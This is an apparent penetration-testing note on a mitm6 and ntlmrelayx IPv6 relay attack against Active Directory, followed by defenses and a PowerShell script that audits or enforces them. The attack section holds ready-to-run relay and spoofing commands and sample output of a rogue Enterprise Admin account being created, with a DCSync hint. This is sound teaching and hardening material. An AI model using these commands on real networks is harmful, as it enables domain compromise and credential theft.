IPv6 Attacks
Attacks
NTLMRelayx
First, we need to start NTLMRelayx in IPv6 mode:
$ ntlmrelayx -6 -t ldaps://[DC] -wh fakewpad.[domain] -l lootme
MITM6
Now we need to start mitm6:
$ sudo mitm6 -d [dc domain] --no-ra
Once an event occurs (login, reboot, etc.), the captured authentication is relayed. If an administrator logs in, ntlmrelayx will automatically create an Enterprise Admin user and give you credentials for it:
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] Attempting to create user in: CN=Users,DC=marvel,DC=local
[*] Adding new user with username: CBjzTmNUUL and password: LXR4]`]#<6H,1~W result: OK
[*] Success! User CBjzTmNUUL now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
Defense
Set Block rules
(Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
(Inbound) Core Networking - Router Advertisement (ICMPv6-In)
(Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)
Disable WPAD
If WPAD is not in use internally, disable it via Group Policy
Disable the WinHttpAutoProxySvc service
Enable LDAP Signing and LDAP Channel Binding
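As an added example (not from the original page), a PowerShell script that audits, or with -Apply enforces, the three defenses above on a Windows host. It assumes the built-in firewall rule display names listed above, and that the LDAPServerIntegrity / LdapEnforceChannelBinding values under the NTDS Parameters key are only meaningful on a domain controller; the -Apply switch is this script's own.

```powershell
# Audit / enforce the mitm6 defenses described above. Run from an elevated prompt.
# Without -Apply it only reports the current state.
param([switch]$Apply)

# 1. Block the built-in Core Networking rules that let a rogue host hand out IPv6 config.
$fwRules = @(
    'Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)',
    'Core Networking - Router Advertisement (ICMPv6-In)',
    'Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)'
)
foreach ($name in $fwRules) {
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        Write-Warning "Firewall rule not found: $name"
        continue
    }
    if ($Apply) { Set-NetFirewallRule -DisplayName $name -Action Block -Enabled True }
    $rule = Get-NetFirewallRule -DisplayName $name
    '{0,-78} Action={1} Enabled={2}' -f $name, $rule.Action, $rule.Enabled
}

# 2. Disable the WPAD auto-proxy service via its Start value (4 = Disabled).
#    Assumption: the registry path is used because Set-Service may be refused on
#    newer builds where the service is protected.
$svcKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
if ($Apply) { Set-ItemProperty -Path $svcKey -Name Start -Value 4 -Type DWord }
'WinHttpAutoProxySvc Start={0} (4 = disabled)' -f (Get-ItemProperty -Path $svcKey).Start

# 3. On a domain controller, require LDAP signing (2) and always enforce channel binding (2),
#    which stops the relayed NTLM authentication from being accepted over LDAP/LDAPS.
$ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
if (Test-Path $ntds) {
    if ($Apply) {
        Set-ItemProperty -Path $ntds -Name LDAPServerIntegrity       -Value 2 -Type DWord
        Set-ItemProperty -Path $ntds -Name LdapEnforceChannelBinding -Value 2 -Type DWord
    }
    $p = Get-ItemProperty -Path $ntds
    'LDAPServerIntegrity={0} (2 = require signing)  LdapEnforceChannelBinding={1} (2 = always)' -f `
        $p.LDAPServerIntegrity, $p.LdapEnforceChannelBinding
} else {
    'NTDS parameters key not present: not a domain controller, LDAP settings skipped'
}
```

Run it once without -Apply on a test host to confirm the three rule names resolve before enforcing; the firewall rules can also be pushed domain-wide through Group Policy rather than per host.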